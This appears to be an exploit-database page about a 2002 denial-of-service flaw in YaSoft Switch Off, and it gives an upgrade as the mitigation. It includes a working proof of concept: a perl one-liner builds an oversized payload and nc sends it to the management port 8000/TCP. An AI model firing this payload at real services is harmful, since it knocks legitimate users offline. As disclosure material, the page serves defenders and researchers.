header-logo
Suggest Exploit
vendor:
Switch Off
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Switch Off
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

YaSoft Switch Off Denial of Service Vulnerability

A problem has been identified in the YaSoft Switch Off software package when handling large packets via the service management port (8000/TCP). This may make it possible for a remote user to deny service to legitimate users of the service. An attacker can exploit this vulnerability by sending a large packet to the service management port (8000/TCP) using the command 'nc 127.0.0.1 8000 < DoS.txt'

Mitigation:

Upgrade to the latest version of YaSoft Switch Off software package
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9339/info

A problem has been identified in the YaSoft Switch Off software package when handling large packets via the service management port (8000/TCP). This may make it possible for a remote user to deny service to legitimate users of the service. 

perl -e "print 'a'x10240 . chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a);" > DoS.txt

nc 127.0.0.1 8000 < DoS.txt

Navigation

Suggest Exploit

Services By CQR